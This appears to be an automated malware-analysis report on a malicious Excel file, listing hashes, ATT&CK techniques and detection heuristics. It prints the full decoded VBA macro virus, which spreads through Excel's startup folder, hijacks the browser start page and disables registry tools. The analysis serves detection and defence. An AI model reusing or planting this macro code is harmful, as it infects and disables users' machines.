Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e1e42a7bd928021…

MALICIOUS

Office (OLE)

113.0 KB Created: 2019-02-20 09:07:50 First seen: 2020-07-24
MD5: 0237f5df796593aac56da0b77fa2013e SHA-1: 13e3fbe263f0b2b73e22dcc62d990042550c5f13 SHA-256: 7e1e42a7bd9280216a79a6a55a1b6781861349e35ea8ad2e9b8390c55cb476ee
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros with an Auto_Open subroutine that utilizes WScript.Shell to execute commands. The script attempts to save a workbook as 'KING.XLS' in the startup path, suggesting an attempt to establish persistence or download a secondary payload. The presence of Shell() and CreateObject calls, along with WScript.Shell usage, strongly indicates malicious intent.

Heuristics 8

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://3azu.taobao.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2787 bytes
SHA-256: bea1b68ffa54a53069dac9d1f8a1efdc7e98367487403037c9efebdfee3658b8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KING"




Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
Attribute ck_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "KING.XLS") 'results
    If m$ = "KING.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    Sheets("KING").Visible = True
    Sheets("KING").Select
    Sheets("KING").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
  Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("KING").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).name
    If s$ <> "KING" Then
        Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("KING").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case Else
End Select
Dim OperationRegistry
On Error Resume Next

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl

RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"

Exit Sub   '正常运行的话会在这里退出程序

End Sub




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.